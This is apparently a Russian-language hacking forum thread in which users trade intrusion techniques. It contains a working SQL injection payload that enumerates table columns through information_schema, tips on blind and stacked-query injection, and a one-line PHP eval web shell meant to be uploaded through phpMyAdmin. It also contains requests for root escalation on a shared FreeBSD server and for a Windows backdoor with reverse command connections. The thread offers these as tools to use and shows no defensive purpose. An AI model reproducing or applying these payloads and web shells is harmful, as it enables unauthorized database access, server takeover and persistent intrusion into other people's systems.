union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1
где 7573657273 users..а вообще читай статьи..это так трудно?

или через group_concat() без лимита, правда иногда может невсе вывести если сильно много данных.

Есть похапе-шелл и возможность компилить локальным юзером на FreeBSD 6.3-RELEASE-p11. На машине еще около двухста юзеров, MySql (5.0.75) и Апач.
Как поднять права до рута? Как можно посмотреть содержимое директорий соседа?

Знаю что не по теме но все таки... Посоветуйте какой нибуть бек дор (системный продукт) для удаленного упр. сервера (предположительно стоит windows 2003/2008)
Главный функционал -> командная строка (телнет чтоли называется) либо отстук куда нибуть (т.е. чтобы зараж. машина брала cmd команды с хоста моего)

Знаю что много щас сущ. продуктов/бек доров но нужен стабильный продукт/бек дор (можно и палевный бек дор)

А какой он должен быть, если скрипт вообще ничего не выводит?

Это blind. Пустой экран - TRUE , more than 1 row - FALSE

Статью прочти, которую я дал в том посте

Посоветуйте шелл который можно через pma залить,весом до 5кб и работающий magic_quotes_gpc On

<?php eval(stripslashes($_REQUEST[ev])); ?>

есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..

в mysql - нет, если конечно скуля не в запросе "update".

а в mssql теоретически можно так script.php?id=4;update.....